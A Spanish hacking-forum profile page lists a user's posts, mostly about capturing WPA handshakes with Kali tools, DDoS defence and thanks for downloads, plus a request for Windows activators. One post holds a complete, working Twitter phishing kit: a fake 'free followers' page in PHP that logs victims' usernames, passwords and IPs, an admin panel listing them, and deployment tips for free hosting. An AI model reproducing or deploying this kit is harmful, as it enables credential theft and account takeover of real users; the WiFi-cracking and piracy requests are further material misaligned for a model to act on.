Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - bernatixer

Páginas1
#1
Dudas y pedidos generales / Re:No consigo el handshake WPA
Febrero 05, 2017, 04:14:39 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Haz la siguiente prueba, conecta otra PC o telefono movil al router y fijate si captura el handshake.
Recuerda que para capturarlo debe haber un cliente conectado y enviar el deauth, o esperar a que uno se conecte.

Por otro lado, que sistema operativo estas usando?
En caso de ser Kali.. que versión es?

Saludos,
ANTRAX

Buenas! Tengo Kali instalado en el portátil, la versión es 4.6.0.
Como me comentas, si que hay un usuario conectado, cuatro, exactamente. He probado a enviar el deauth y sigue igual que antes. Pero he hecho la prueba que me has comentado y funciono! Ya tengo el handhake. Voy a probar la otra solución de Kelo_07.
Gracias!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta !
Yo hace un tiempo tuve ese problema,  pero dinno me dio una respuesta:

Primero que nada, como dinno te comento,si o si necesitas un cliente conectado tanto en wpa como en wpa2.

Segundo, aveces es como que no te aparece el handshake como capturado pero si lo hace.

Otra solución que ami me resulto es la siguiente, instale la herramienta fluxion en mi kali (donde también necesitas un cliente conectado para operar), la misma me ha resultado mas eficiente para capturar los handshakes..

Lo bueno de esta herramienta es que cuando usas el comando aircrack-ng en vez de pasarle el archivo .cap que creas usando airodump-ng , le puedes poner el archivo de handshake obtenido con tu fluxion.

Espero que te resulte útil esta información

Saludos!

Gracias por la información, ahora lo probare!
#2
Dudas y pedidos generales / No consigo el handshake WPA
Febrero 05, 2017, 03:46:46 PM
Buenas, estoy intentando crackear mi WiFi y no consigo sacar el handshake. Lo que hago es dejar el airodump abierto monitoreando la WiFi, luego le envio unos 10 paquetes de deauth. En todos los lugares en este paso ya consiguen el handshake, pero yo no.

Dejo algo de información adicional:
Interface: wlan0mon
Driver: ath10k_pci
Chipset: Qualcomm Atheros QCA9377 802.11ac Wireless Network Adapter (rev 31)

He estado buscando y parece que este Chip si permite inyección de paquetes. Así que no se que puede estar pasando, gracias!
PD: La WiFi esta cerca de donde capturo los paquetes
#3
Underc0de / Re:Inscripciones Abiertas Centro de Investigacion de Underc0de
Enero 08, 2017, 07:43:18 AM
Hola, me parece muy buena idea!

Se de PHP, NodeJS, C++ (Actualmente aprendiendo), y las nociones básicas de Java y Python. También me muevo bien en las bases de datos, tanto SQL como NoSQL y me manejo bien con la consola de Linux.
Me gusta el desarrollo web, así que aunque no se me ocurra ningún proyecto ahora mismo estoy seguro que con el team algo saldrá!

Un saludo! bernatixer
#4
Dudas y pedidos generales / Re:Duda sobre protección DDoS
Diciembre 16, 2016, 05:04:13 PM
Gracias por la respuesta ANTRAX, una duda, como puedo analizar el ataque, es decir para saber de donde provienen las IPs que nos atacan, con que frecuencia...

Gracias!
#5
Dudas y pedidos generales / Duda sobre protección DDoS
Diciembre 16, 2016, 04:38:17 PM
Buenas, describo la situación. Tengo un servidor de un juego, este últimamente esta recibiendo ataques de ~5Gbps. Mi duda es, como puedo preveer estos ataques? Por lo visto atacan con UDP.

Edit:

Gracias de antemano.
#6
Pentesting / Re:upload.php [Vulnerabilidad]
Febrero 09, 2016, 11:07:38 AM
Buen aporte, gracias por compartirlo   :)
#7
Cursos, manuales y libros / Re:CEH - Certified Ethical Hacker v9
Febrero 05, 2016, 12:21:20 PM
Gracias por compartir!! Descargando...  ;)
#8
Diseño UX/UI / Re:Pide tu firma Underc0de V3.
Enero 31, 2016, 08:23:01 AM
Una con bernatixer, gracias y felicidades por el trabajo!!
#9
Dudas y pedidos generales / Re:Activar Windows 10
Enero 18, 2016, 06:47:28 PM
Hey, me ha servido la info, muchas gracias!!
#10
Dudas y pedidos generales / [SOLUCIONADO] Activar Windows 10
Enero 17, 2016, 05:32:01 PM
Buenas, hace poco pasé de W7 al 10 y lo tengo que activar, alguien sabe algún activador o serial que funcione? He buscado seriales pero la verdad esque ninguno me ha funcionado.

Gracias de antemano ;)
#11
Hacking / Re:Curso de Hacking Ético Avanzado - 2.82 GB
Enero 17, 2016, 05:15:11 PM
Gracias por el aporte, descargando...  ;D
#12
Desarrollo y modificación de malwares / Re:RANSOMWARE: ¿Qué es? ¿Cómo funciona? ¿Cómo Crearlo? By fudmario.
Enero 07, 2016, 10:29:00 AM
Pinta muy bien la saga jejej a esperar se ha dicho la siguiente entrega  :)
#13
Underc0de / Re:Recibe noticias informáticas por WhatsApp!
Enero 07, 2016, 08:36:40 AM
Enviado!  ;)
#14
Talleres Underc0de / Re:Taller de Seguridad Web #1
Enero 02, 2016, 09:24:34 AM
Muy bien escrito y fácil de entender, gracias por el aporte!
#15
Hacking / Re:[Phishing] Página de phishing para Twitter
Enero 02, 2016, 09:22:57 AM
Gracias por avisar de la vulnerabilidad, ya esta solucionado  ;)
#16
Hacking / [Phishing] Página de phishing para Twitter
Enero 01, 2016, 11:57:36 AM

Buenas soy bernatixer, hasta el día de hoy underc0de y sus usuarios me han proporcionado mucha información y herramientas, así que hoy decido aportar mi granito de arena a la comunidad.

Se trata de una página de phishing para twitter. La web pretende añadir seguidores (bots) a tu cuenta de twitter, y como todos sabemos cuando alguien con pocos conocimientos busca algo gratis (que normalmente es de pago) se descarga todo e introduce sus datos donde sea por tal de lograrlo. Así que en este caso nos vamos a aprovechar de esto.

Funcionamiento:
El usuario (víctima) entra en la web, introduce sus datos (usuario y contraseña :D) el número de seguidores que quiere (para hacerlo más real a partir de 1000 seguidores tendrá que pagar...) le da a un botón y que mala suerte! Ha ocurrido un error al añadir los seguidores a su cuenta.
Estos datos se guardaran en un archivo TXT, así que en ningún momento se va a necesitar MySQL, SQLite, o cualquier otro.
Y para terminar, hay un panel de admin de todas las víctimas, su usuario, contraseña y IP, todo automatico. (La contraseña default del panel de admin es 'b3rn4t1x3r').

Información técnica:
La web esta programada con Bootstrap para hacerla responsive, limpia etc... No se necesita descargar ningún archivo CSS ni JS, están todos alojados en un CDN y minificados, así que se aumenta el tiempo de respuesta. En resumen, todo esto es para que la víctima vea que la web esta algo trabajada y confíe mas en nosotros.

Si quieres provar la web, la he subido a mi servidor (Las IPs no se muestran en esta versión)
[Porvafor si quereis hacer phishing no paseis este link, seguid el tutorial de abajo]
Phishing: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Citar
Panel: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Citar

Tutorial:
La web es muy fácil de editar, pero si no dominais mucho aquí van unas pequeñas explicaciones.
Teniendo en cuenta que el HTML es senzillo de entender voy a pasar directamente al PHP y si teneis alguna duda simplemente comentadla.
Lo que hace falta saber de PHP en el archivo 'index.php' es que si quereis cambiar el archivo de logs (Por defecto: datos.txt) teneis que canviar la variable [$fichero = "datos.txt";]
Del archivo 'admin.php' solo hace falta saber cambiar la pass, está en la línea 35. Nada mas, es algo senzillo en los dos casos.

No teneis servidor para hacer pruebas o subir la web? Os dejo una lista de hostings gratis:
- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

IMPORTANTE: Recordad crear el archivo 'datos.txt', ya que sino no funcionara correctamente.
index.php

Código: php

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Twitter - Bots</title>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
    <style>
    body {
      height:100%;
      width:100%;
      background-image: url("http://www.imperial.ac.uk/imedia/general_graphics/interact/images/twitterBG.jpg");
      background-repeat: no-repeat;
      background-size:cover;
    }
    .centrar {
      min-height: 100vh;
      display: flex;
      align-items: center;
    }
    </style>
  </head>
  <body>
  <?php
  if (isset($_POST["usuario"]) && isset($_POST["pass"])) {
    $fichero = "datos.txt";
    $usuario = htmlentities(str_replace("<:>","",$_POST["usuario"]));
    $pass = htmlentities(str_replace("<:>","",$_POST["pass"]));
    $ip = $_SERVER['REMOTE_ADDR'];
    $text = $usuario."<:>".$pass."<:>".$ip;
    $nuevo = file_get_contents($fichero);
    $nuevo .= $text."\n";
    file_put_contents($fichero, $nuevo);
    $m = "<div class='alert alert-danger' role='alert'>Error 225; No se han podido añadir los seguidores en tu cuenta.</div>";
  }else{
    $m = "";
  }
  ?>
  <div class="container centrar">
    <div class="row">
      <div class="col-md-12">
        <div class="alert alert-info">
          <h1><b>SEGUIDORES EN TWITTER GRATIS</b></h1><hr/>
          <form method="POST" action="#">
            <?php echo $m; ?>
            <input name="usuario" type="text" class="form-control" placeholder="Nombre de usuario"><br/>
            <input name="pass" type="password" class="form-control" placeholder="Contraseña"><br/>
            <select class="form-control">
              <option>10 seguidores (GRATIS)</option>
              <option>50 seguidores (GRATIS)</option>
              <option>100 seguidores (GRATIS)</option>
              <option>1000 seguidores (GRATIS)</option>
              <option>5000 seguidores (10€)</option>
              <option>10000 seguidores (50€)</option>
            </select><br/>
            <button class="btn btn-success btn-lg btn-block" type="submit">Añadir seguidores</button>
          </form>
        </div>
      </div>
    </div>
  </div>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>
  </body>
</html>


admin.php

Código: php

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Twitter - Bots</title>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1Au+a5WDVnPi2lkFfwwEAa8hDDdjZlpLegxhjVME1fgjWPGmkzs7" crossorigin="anonymous">
    <style>
    body {
      height:100%;
      width:100%;
      background-image: url("https://mal.sec.gd/images/bgSlider/img01.png");
      background-repeat: no-repeat;
      background-size:cover;
    }
    .espacio {
      margin-top: 5vh;
    }
    </style>
  </head>
  <body>
  <div class="container espacio">
  <div class="alert alert-danger">
    <?php
if (!isset($_POST["pass"])) {
    ?>
    <form method="POST" action="#">
      <input name="pass" type="password" class="form-control" placeholder="Contraseña"><br/>
      <button class="btn btn-danger btn-lg btn-block" type="submit">Entrar</button>
    </form>
    <?php
    exit;
} else {
if ($_POST["pass"] != "b3rn4t1x3r") {
  ?>
  <div class='alert alert-warning' role='alert'>Contraseña incorrecta</div>
  <form method="POST" action="#">
    <input name="pass" type="password" class="form-control" placeholder="Contraseña"><br/>
    <button class="btn btn-danger btn-lg btn-block" type="submit">Entrar</button>
  </form>
  <?php
} else {
?>
    <div class="text-right"><a class="btn btn-danger" href="">Salir</a></div>
    <h2>Datos de los usuarios</h2><hr/>
    <table class="table table-striped">
      <thead>
        <tr>
          <th>Usuario</th>
          <th>Contraseña</th>
          <th>IP</th>
        </tr>
      </thead>
      <tbody>
        <?php
        $fichero = fopen('datos.txt','r');
        while ($linea = fgets($fichero)) {
          $array = explode('<:>', trim($linea));
          echo "<tr>";
          echo "<th><font color='green'>". $array[0] ."</font></th>";
          echo "<th><font color='green'>". $array[1] ."</font></th>";
          echo "<th><font color='green'>". $array[2] ."</font></th>";
          echo "</tr>";
        }
        fclose($fichero);
        ?>
      </tbody>
    </table>
  </div>
  <?php
}
}
  ?>
  </div>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js" integrity="sha384-0mSbJDEHialfmuBBQP6A4Qrprq5OVfW37PRR3j5ELqxss1yVqOtnepnHVP9aJ7xS" crossorigin="anonymous"></script>
  </body>
</html>
Páginas1